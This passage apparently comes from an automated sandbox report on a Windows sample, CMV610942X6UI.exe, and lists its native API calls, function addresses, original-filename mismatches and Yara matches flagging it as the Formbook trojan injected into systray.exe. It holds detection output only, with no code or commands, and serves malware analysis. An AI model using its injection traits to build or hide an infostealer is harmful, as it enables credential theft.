Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05243D10 NtOpenProcessToken, 8_2_05243D10
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05243D70 NtOpenThread, 8_2_05243D70
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_03257760 NtReadFile, 8_2_03257760
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_03257600 NtCreateFile, 8_2_03257600
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_03257A40 NtAllocateVirtualMemory, 8_2_03257A40
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_03257850 NtDeleteFile, 8_2_03257850
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_032578E0 NtClose, 8_2_032578E0
Detected potential crypto function
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 0_2_00C7D364 0_2_00C7D364
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 0_2_027F1A70 0_2_027F1A70
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 0_2_027F5AB0 0_2_027F5AB0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 0_2_027F6B50 0_2_027F6B50
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 0_2_027F1198 0_2_027F1198
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0042D053 3_2_0042D053
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_004030C0 3_2_004030C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0040F943 3_2_0040F943
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0040F93C 3_2_0040F93C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_004161DE 3_2_004161DE
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_004161E3 3_2_004161E3
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0040FB63 3_2_0040FB63
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00402B20 3_2_00402B20
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0040DBE3 3_2_0040DBE3
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_004023B0 3_2_004023B0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00402660 3_2_00402660
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101A118 3_2_0101A118
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01008158 3_2_01008158
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010341A2 3_2_010341A2
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010401AA 3_2_010401AA
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010381CC 3_2_010381CC
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01012000 3_2_01012000
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F70100 3_2_00F70100
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103A352 3_2_0103A352
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010403E6 3_2_010403E6
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8E3F0 3_2_00F8E3F0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01020274 3_2_01020274
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010002C0 3_2_010002C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01040591 3_2_01040591
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01024420 3_2_01024420
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01032446 3_2_01032446
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80535 3_2_00F80535
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0102E4F6 3_2_0102E4F6
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9C6E0 3_2_00F9C6E0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7C7C0 3_2_00F7C7C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80770 3_2_00F80770
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA4750 3_2_00FA4750
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAE8F0 3_2_00FAE8F0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F668B8 3_2_00F668B8
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0104A9A6 3_2_0104A9A6
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8A840 3_2_00F8A840
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F82840 3_2_00F82840
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F829A0 3_2_00F829A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F96962 3_2_00F96962
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103AB40 3_2_0103AB40
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7EA80 3_2_00F7EA80
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01036BD7 3_2_01036BD7
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F70CF2 3_2_00F70CF2
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101CD1F 3_2_0101CD1F
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80C00 3_2_00F80C00
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7ADE0 3_2_00F7ADE0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F98DBF 3_2_00F98DBF
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01020CB5 3_2_01020CB5
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8AD00 3_2_00F8AD00
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01022F30 3_2_01022F30
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F92E90 3_2_00F92E90
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80E59 3_2_00F80E59
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8CFE0 3_2_00F8CFE0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103EE26 3_2_0103EE26
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F72FC8 3_2_00F72FC8
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FFEFA0 3_2_00FFEFA0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103CE93 3_2_0103CE93
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF4F40 3_2_00FF4F40
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA0F30 3_2_00FA0F30
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FC2F28 3_2_00FC2F28
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103EEDB 3_2_0103EEDB
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F870C0 3_2_00F870C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0104B16B 3_2_0104B16B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F8B1B0 3_2_00F8B1B0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6F172 3_2_00F6F172
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB516C 3_2_00FB516C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0102F0CC 3_2_0102F0CC
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103F0E0 3_2_0103F0E0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010370E9 3_2_010370E9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103132D 3_2_0103132D
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9B2C0 3_2_00F9B2C0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F852A0 3_2_00F852A0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FC739A 3_2_00FC739A
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6D34C 3_2_00F6D34C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010212ED 3_2_010212ED
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01037571 3_2_01037571
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F71460 3_2_00F71460
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101D5B0 3_2_0101D5B0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103F43F 3_2_0103F43F
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103F7B0 3_2_0103F7B0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FC5630 3_2_00FC5630
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_010316CC 3_2_010316CC
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01015910 3_2_01015910
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F838E0 3_2_00F838E0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FED800 3_2_00FED800
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F89950 3_2_00F89950
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9B950 3_2_00F9B950
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FC5AA0 3_2_00FC5AA0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103FB76 3_2_0103FB76
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF3A6C 3_2_00FF3A6C
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FBDBF9 3_2_00FBDBF9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF5BF0 3_2_00FF5BF0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01037A46 3_2_01037A46
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103FA49 3_2_0103FA49
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9FB80 3_2_00F9FB80
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01021AA3 3_2_01021AA3
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101DAAC 3_2_0101DAAC
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0102DAC6 3_2_0102DAC6
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01031D5A 3_2_01031D5A
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01037D73 3_2_01037D73
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FF9C32 3_2_00FF9C32
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9FDC0 3_2_00F9FDC0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F83D40 3_2_00F83D40
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103FCF2 3_2_0103FCF2
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103FF09 3_2_0103FF09
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F89EB0 3_2_00F89EB0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103FFB1 3_2_0103FFB1
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F43FD5 3_2_00F43FD5
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F43FD2 3_2_00F43FD2
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F81F92 3_2_00F81F92
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05210535 8_2_05210535
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052D0591 8_2_052D0591
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052B4420 8_2_052B4420
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052C2446 8_2_052C2446
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052BE4F6 8_2_052BE4F6
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05210770 8_2_05210770
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05234750 8_2_05234750
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0520C7C0 8_2_0520C7C0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0522C6E0 8_2_0522C6E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05200100 8_2_05200100
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052AA118 8_2_052AA118
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05298158 8_2_05298158
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052D01AA 8_2_052D01AA
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052C41A2 8_2_052C41A2
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052C81CC 8_2_052C81CC
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052A2000 8_2_052A2000
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052CA352 8_2_052CA352
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052D03E6 8_2_052D03E6
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0521E3F0 8_2_0521E3F0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052B0274 8_2_052B0274
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052902C0 8_2_052902C0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0521AD00 8_2_0521AD00
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052ACD1F 8_2_052ACD1F
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05228DBF 8_2_05228DBF
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0520ADE0 8_2_0520ADE0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05210C00 8_2_05210C00
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052B0CB5 8_2_052B0CB5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05200CF2 8_2_05200CF2
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05252F28 8_2_05252F28
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05230F30 8_2_05230F30
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052B2F30 8_2_052B2F30
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05284F40 8_2_05284F40
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0528EFA0 8_2_0528EFA0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0521CFE0 8_2_0521CFE0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05202FC8 8_2_05202FC8
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052CEE26 8_2_052CEE26
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05210E59 8_2_05210E59
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05222E90 8_2_05222E90
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052CCE93 8_2_052CCE93
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052CEEDB 8_2_052CEEDB
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05226962 8_2_05226962
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052129A0 8_2_052129A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052DA9A6 8_2_052DA9A6
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0521A840 8_2_0521A840
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05212840 8_2_05212840
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_051F68B8 8_2_051F68B8
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0523E8F0 8_2_0523E8F0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052CAB40 8_2_052CAB40
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052C6BD7 8_2_052C6BD7
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0520EA80 8_2_0520EA80
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052C7571 8_2_052C7571
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052AD5B0 8_2_052AD5B0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052D95C3 8_2_052D95C3
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052CF43F 8_2_052CF43F
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05201460 8_2_05201460
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052CF7B0 8_2_052CF7B0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05255630 8_2_05255630
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052C16CC 8_2_052C16CC
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052DB16B 8_2_052DB16B
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0524516C 8_2_0524516C
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_051FF172 8_2_051FF172
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0521B1B0 8_2_0521B1B0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052C70E9 8_2_052C70E9
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052CF0E0 8_2_052CF0E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052170C0 8_2_052170C0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052BF0CC 8_2_052BF0CC
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052C132D 8_2_052C132D
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_051FD34C 8_2_051FD34C
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0525739A 8_2_0525739A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052152A0 8_2_052152A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052B12ED 8_2_052B12ED
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0522B2C0 8_2_0522B2C0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052C7D73 8_2_052C7D73
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05213D40 8_2_05213D40
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052C1D5A 8_2_052C1D5A
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0522FDC0 8_2_0522FDC0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05289C32 8_2_05289C32
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052CFCF2 8_2_052CFCF2
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052CFF09 8_2_052CFF09
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052CFFB1 8_2_052CFFB1
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05211F92 8_2_05211F92
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_051D3FD5 8_2_051D3FD5
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_051D3FD2 8_2_051D3FD2
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05219EB0 8_2_05219EB0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052A5910 8_2_052A5910
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05219950 8_2_05219950
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0522B950 8_2_0522B950
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0527D800 8_2_0527D800
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052138E0 8_2_052138E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052CFB76 8_2_052CFB76
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0522FB80 8_2_0522FB80
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05285BF0 8_2_05285BF0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0524DBF9 8_2_0524DBF9
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05283A6C 8_2_05283A6C
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052CFA49 8_2_052CFA49
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052C7A46 8_2_052C7A46
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_05255AA0 8_2_05255AA0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052ADAAC 8_2_052ADAAC
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052B1AA3 8_2_052B1AA3
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052BDAC6 8_2_052BDAC6
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_032413B0 8_2_032413B0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0323C600 8_2_0323C600
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0323C5F9 8_2_0323C5F9
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0323C820 8_2_0323C820
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0323A8A0 8_2_0323A8A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_03242EA0 8_2_03242EA0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_03242E9B 8_2_03242E9B
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_03259D10 8_2_03259D10
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04FCA2C9 8_2_04FCA2C9
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04FCAFF8 8_2_04FCAFF8
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04FCBF8C 8_2_04FCBF8C
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04FCBAD4 8_2_04FCBAD4
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04FCBBF3 8_2_04FCBBF3
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 0528F290 appears 105 times
Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 05257E54 appears 111 times
Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 051FB970 appears 280 times
Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 0527EA12 appears 86 times
Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 05245130 appears 58 times
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: String function: 00FB5130 appears 58 times
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: String function: 00FEEA12 appears 86 times
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: String function: 00FFF290 appears 105 times
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: String function: 00FC7E54 appears 103 times
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: String function: 00F6B970 appears 280 times
Sample file is different than original file name gathered from version info
Source: CMV610942X6UI.exe, 00000000.00000000.1389288785.0000000000630000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesxkr.exe> vs CMV610942X6UI.exe
Source: CMV610942X6UI.exe, 00000000.00000002.1500176018.00000000029E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRT.dll. vs CMV610942X6UI.exe
Source: CMV610942X6UI.exe, 00000000.00000002.1504679436.000000000D150000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs CMV610942X6UI.exe
Source: CMV610942X6UI.exe, 00000000.00000002.1503469878.0000000005570000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRT.dll. vs CMV610942X6UI.exe
Source: CMV610942X6UI.exe, 00000000.00000002.1499643954.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs CMV610942X6UI.exe
Source: CMV610942X6UI.exe, 00000003.00000002.1790525561.000000000106D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs CMV610942X6UI.exe
Source: CMV610942X6UI.exe, 00000003.00000002.1790384928.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesystray.exej% vs CMV610942X6UI.exe
Source: CMV610942X6UI.exe Binary or memory string: OriginalFilenamesxkr.exe> vs CMV610942X6UI.exe
Uses 32bit PE files
Source: CMV610942X6UI.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 3.2.CMV610942X6UI.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.CMV610942X6UI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3262194448.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3262116484.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.1790265405.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
